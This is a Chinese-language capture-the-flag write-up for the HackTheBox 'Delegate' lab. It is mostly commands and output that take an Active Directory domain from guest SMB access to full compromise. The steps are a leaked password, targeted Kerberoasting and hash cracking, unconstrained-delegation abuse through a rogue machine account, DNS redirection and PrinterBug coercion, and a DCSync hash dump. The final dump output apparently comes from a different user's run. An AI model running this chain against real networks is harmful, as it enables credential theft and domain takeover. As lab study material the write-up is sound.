前期信息收集
初期分析
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ cat hostname
10.129.234.69 DC1.delegate.vl delegate.vl DC1
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo domain=delegate.vl>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo FQDN=DC1.delegate.vl>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ cat start.sh
ip=10.129.234.69
domain=delegate.vl
FQDN=DC1.delegate.vl
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ . start.sh
端口扫描,判断为纯正dc
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ cat rustscan.txt
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨
[~] The config file is expected to be at "/home/wackymaker/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.234.69:53
Open 10.129.234.69:88
Open 10.129.234.69:135
Open 10.129.234.69:139
Open 10.129.234.69:389
Open 10.129.234.69:445
Open 10.129.234.69:464
Open 10.129.234.69:593
Open 10.129.234.69:636
Open 10.129.234.69:3269
Open 10.129.234.69:3268
Open 10.129.234.69:3389
Open 10.129.234.69:5985
Open 10.129.234.69:9389
入口
存在匿名share
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc smb "$ip" -u guest -p '' --shares
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domin:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\guest:
SMB 10.129.234.69 445 DC1 [*] Enumerated shares
SMB 10.129.234.69 445 DC1 Share Permissions Remark
SMB 10.129.234.69 445 DC1 ----- ----------- ------
SMB 10.129.234.69 445 DC1 ADMIN$ Remote Admin
SMB 10.129.234.69 445 DC1 C$ Default share
SMB 10.129.234.69 445 DC1 IPC$ READ Remote IPC
SMB 10.129.234.69 445 DC1 NETLOGON READ Logon server share
SMB 10.129.234.69 445 DC1 SYSVOL READ Logon server share
查看非初始目录NETLOGON,发现敏感脚本泄露了凭证
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ smbclient //$ip/NETLOGON -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
4652287 blocks of size 4096. 984341 blocks available
smb: \> get users.bat
getting file \users.bat of size 159 as users.bat (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
凭证权限正确,抓取猎犬
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo user=A.Briggs>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo pass='P4ssw0rd1#123'>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ . start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc ldap $ip -u $user -p $pass
LDAP 10.129.234.69 389 DC1 [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.69 389 DC1 [+] delegate.vl\A.Briggs:P4ssw0rd1#123
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ bloodhound-python -d $domain -c ALL -u $user -p $pass -ns $ip --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc1.delegate.vl:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 17S
INFO: Compressing output into 20250921220229_bloodhound.zip
猎犬的权限很简单,我就口述不贴图了,我们控制的这个用户A.BRIGGS@DELEGATE.VL对N.THOMPSON@DELEGATE.VL这个用户有通用写入权限,并且这个用户在远程管理组,应该就是下一步的路径,没有配置kpinit,直接打靶向kerbresating
首先给其注册服务
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ bloodyAD -d "$domain" --host "$ip" -u "$user" -p "$pass" set object "N.THOMPSON" servicePrincipalName -v 'http/anything'
[+] N.THOMPSON's servicePrincipalName has been updated
同步时间后打kerbresating
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ impacket-GetUserSPNs $domain/$user:$pass -dc-host $FQDN -dc-ip $ip -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ---------- ----------------------------------------------- -------------------------- -------------------------- ----------
http/anything N.Thompson CN=delegation admins,CN=Users,DC=delegate,DC=vl 2023-09-09 11:17:16.247262 2023-09-16 03:18:20.238500
[-] CCache file is not found. Skipping...
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ab77a79521321ac54700c727df347190$b5c30f649f35513d225a34e68354f7f0390e23322c84bb8f6c8c1f3b919ab5de89be685ca3ef73dd53b6c317a4e40bb............5feb2b954815b4ed179c178af25c12310fa2edfdb80f260975610aeada10c73489850734331cff27a185b7bec45fafaa0fc492d0620fc062532f39d02086ef87174eb0feb727ea633b64cd0e3c31c7f9e6256d99df5de1c1b393b88d5350b95182ea6167c263db810bc3e7e914a1c34d51ebdc11f37d20f7c36e871f6b232c120d1d2b887702c6f279b24a5a523107cd8e12cfd1828746e069f7a64d7148fad0f542e4fcbf17cb7dd5b3b6f12cfd8e4aebab39ef494acfe77a484b25f9dc40c23adbf93f4c7f4968a57cc
爆破v2hash
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo '$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ab77a79521321ac54700c727df347190$b5c30f649f35513d225a34e68354f7f0390e23322c84bb8f6c8c1f3b919ab5de89be685ca3ef73dd53b6c317a4e40bb........4a5a523107cd8e12cfd1828746e069f7a64d7148fad0f542e4fcbf17cb7dd5b3b6f12cfd8e4aebab39ef494acfe77a484b25f9dc40c23adbf93f4c7f4968a57cca76e4fffdc54dd0a80cbd8daf1888b0096a91957307cac2afd0e73c1c2a07ad4feb611ac0900fc79351df45800ebf802674fd2b76449da3f83eece2'>hash
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ hashcat hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) Ultra 9 185H, 6939/13942 MB (2048 MB allocatable), 8MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 2 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ab77a79521321ac54700c727df347190$b5c30f649f35513d225a34e68354f7f0390e23322c84bb8f6c8c1f3b919ab5de89be685ca3ef73dd53b6c317a4e40bb3712f1785ab2fe3e070bbf6788c035f053e6e6d51758879eb0e7199e49740aac4bba8719d312af7dffcd471a152daa3736161f15b22375e3cc0a5a48d589066b9df4a0c16e811da2fe0b4c12df8ed42fbddf1efea66e056946b2c11ac3b4e3128df00f207ab18741d1a9e5362fb4703be2c0e9bd9bae37e8be8f2ed8596c78d81c3f8388341641cf9003。。。。620fc062532f39d02086ef87174eb0feb727ea633b64cd0e3c31c7f9e6256d99df5de1c1b393b88d5350b95182ea6167c263db810bc3e7e914a1c34d51ebdc11f37d20f7c36e871f6b232c120d1d2b887702c6f279b24a5a523107cd8e12cfd1828746e069f7a64d7148fad0f542e4fcbf17cb7dd5b3b6f12cfd8e4aebab39ef494acfe77a484b25f9dc40c23adbf93f4c7f4968a57cca76e4fffdc54dd0a80cbd8daf1888b0096a91957307cac2afd0e73c1c2a07ad4feb611ac0900fc79351df45800ebf802674fd2b76449da3f83eece2:KALEB_2341
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.T...3eece2
Time.Started.....: Sun Sep 21 22:14:19 2025 (5 secs)
Time.Estimated...: Sun Sep 21 22:14:24 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2302.4 kH/s (1.95ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344385 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 11001856/14344385 (76.70%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: KANGOL1 -> Joytjiong1
Hardware.Mon.#1..: Util: 50%
Started: Sun Sep 21 22:14:15 2025
Stopped: Sun Sep 21 22:14:26 2025
获取用户凭证,存在winrm权限
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo pass2=KALEB_2341>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo user2=N.Thompson>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ . start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc winrm $ip -u $user2 -p $pass2
WINRM 10.129.234.69 5985 DC1 [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl)
WINRM 10.129.234.69 5985 DC1 [+] delegate.vl\N.Thompson:KALEB_2341 (Pwn3d!)
登陆后获得user.txt,就不放出来了
提权
此用户存在特殊权限
evil-winrm-py PS C:\Users\N.Thompson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeEnableDelegationPrivilege这个权限我昨天在博客解析过了,血缇之书中记录过打法
先测试能否进行无约束委派的创建(检测机器用户创建权限)
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc ldap $ip -u $user2 -p $pass2 -M maq
/home/wackymaker/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import resource_filename
LDAP 10.129.234.69 389 DC1 [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.69 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
MAQ 10.129.234.69 389 DC1 [*] Getting the MachineAccountQuota
MAQ 10.129.234.69 389 DC1 MachineAccountQuota: 10
中继触发流程也正常
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc smb $ip -u $user2 -p $pass2 -M coerce_plus
/home/wackymaker/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import resource_filename
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domin:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PetitPotam
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, MSEven
创建机器用户,并转录密码为hash方便下一步攻击
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ impacket-addcomputer -computer-name FS01 -computer-pass 'wackwack1$' -dc-ip $ip $domain/$user2:$pass2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account FS01$ with password wackwack1$.
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ iconv -f ASCII -t UTF-16LE <(printf 'wackwack1$') | openssl dgst -md4
MD4(stdin)= 58826d80a57b1527e373616eec499b06
修改创建机器用户的dns记录导向我们的kali
┌──(wackymaker㉿kali)-[~/tools/ad-tools/krbrelayx/krbrelayx-master]
└─$ python3 dnstool.py -u 'delegate.vl\FS01$' -p 'wackwack1$' --action add --record FS01.delegate.vl --data 10.10.16.23 --type A -dns-ip 10.129.6.221 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
配置spn
┌──(wackymaker㉿kali)-[~/tools/ad-tools/krbrelayx/krbrelayx-master]
└─$ python3 addspn.py -u 'delegate.vl\FS01$' -p 'wackwack1$' -s 'cifs/FS01.delegate.vl' -t FS01$ -dc-ip 10.129.6.221 DC1.delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
┌──(wackymaker㉿kali)-[~/tools/ad-tools/krbrelayx/krbrelayx-master]
└─$ python3 addspn.py -u 'delegate.vl\FS01$' -p 'wackwack1$' -s 'cifs/FS01.delegate.vl' -t FS01$ -dc-ip 10.129.6.221 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
利用bloodyad配置无约束委派
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ bloodyAD -d $domain -u $user2 -p $pass2 --host $FQDN add uac 'FS01$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl
启动中继监听
┌──(wackymaker㉿kali)-[~/tools/ad-tools/krbrelayx/krbrelayx-master]
└─$ python3 krbrelayx.py -hashes :58826d80a57b1527e373616eec499b06
/home/wackymaker/tools/ad-tools/krbrelayx/krbrelayx-master/lib/servers/smbrelayserver.py:429: SyntaxWarning: invalid escape sequence '\%'
LOG.error("Authenticating against %s://%s as %s\%s FAILED" % (
/home/wackymaker/tools/ad-tools/krbrelayx/krbrelayx-master/lib/servers/smbrelayserver.py:441: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
/home/wackymaker/tools/ad-tools/krbrelayx/krbrelayx-master/lib/servers/smbrelayserver.py:516: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
在另外一边触发一个可用强制认证
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc smb $ip -u "FS01$" -p 'wackwack1$' -M coerce_plus -o LISTENER=FS01.$domain METHOD=PrinterBug
/home/wackymaker/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import resource_filename
SMB 10.129.6.221 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domin:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.6.221 445 DC1 [+] delegate.vl\FS01$:wackwack1$
COERCE_PLUS 10.129.6.221 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.6.221 445 DC1 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
成功触发后,监听器出现回显
*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.3.28
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.3.28
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.3.28
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
成功截获tgt
直接利用票据打dcsync获取管理hash即可
KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache netexec smb dc1.delegate.vl --use-kcache --ntds
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB dc1.delegate.vl 445 DC1 [+] DELEGATE.VL\DC1$ from ccache
SMB dc1.delegate.vl 445 DC1 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc1.delegate.vl 445 DC1 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc1.delegate.vl 445 DC1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
SMB dc1.delegate.vl 445 DC1 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB dc1.delegate.vl 445 DC1 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
SMB dc1.delegate.vl 445 DC1 A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
SMB dc1.delegate.vl 445 DC1 b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
SMB dc1.delegate.vl 445 DC1 R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
SMB dc1.delegate.vl 445 DC1 J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
SMB dc1.delegate.vl 445 DC1 N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
SMB dc1.delegate.vl 445 DC1 DC1$:1000:aad3b435b51404eeaad3b435b51404ee:f7caf5a3e44bac110b9551edd1ddfa3c:::
SMB dc1.delegate.vl 445 DC1 [+] Dumped 11 NTDS hashes to /home/oxdf/.nxc/logs/ntds/dc1.delegate.vl_None_2025-09-12_133554.ntds of which 8 were added to the database
SMB dc1.delegate.vl 445 DC1 [*] To extract only enabled accounts from the output file, run the following command:
SMB dc1.delegate.vl 445 DC1 [*] cat /home/oxdf/.nxc/logs/ntds/dc1.delegate.vl_None_2025-09-12_133554.ntds | grep
之后hash登陆即可